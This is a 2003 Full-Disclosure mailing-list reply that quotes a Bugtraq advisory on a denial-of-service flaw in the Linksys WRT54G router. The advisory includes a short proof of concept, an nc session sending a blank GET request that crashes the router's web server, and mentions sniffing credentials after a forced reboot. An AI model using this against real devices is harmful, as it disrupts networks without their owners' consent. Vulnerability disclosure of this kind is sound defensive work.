[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]
- To: Michael Renzmann <security@dylanic.de>
- Subject: Re: [Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]
- From: "kang@insecure.ws" <kang@insecure.ws>
- Date: Thu, 04 Dec 2003 13:12:06 +0100
despite being very similar, my WAP54G *isn't* vulnerable
:)
(*Firmware: v1.08, Aug 05, 2003)*
*
*Michael Renzmann wrote:
Can anyone confirm if technically identical devices such as the
Buffalo WBR-G54 share this vulnerability?
-------- Original Message --------
Subject: Linksys WRT54G Denial of Service Vulnerability
Date: 3 Dec 2003 22:35:26 -0000
From: <test@techcentric.net>
To: bugtraq@securityfocus.com
Linksys WRT54G Denial of Service Vulnerability
System(s)
===========
Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
Detail(s)
===========
Sending a blank GET request to the router on port 80 (or 8080) halts
the embedded webserver. This may allow an attacker to force the owner
to reboot the router, allowing them to gain sensitive information
during router authentication.
Exploitation
============
user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$
Solution(s)
============
- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and
performing any authentication.
- Wait for a vendor patch :)
Status
============
Vendor contacted on 12/03/03.
!HAPPY HOLIDAYS!
carbon@techcentric.net - 12/02/03
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html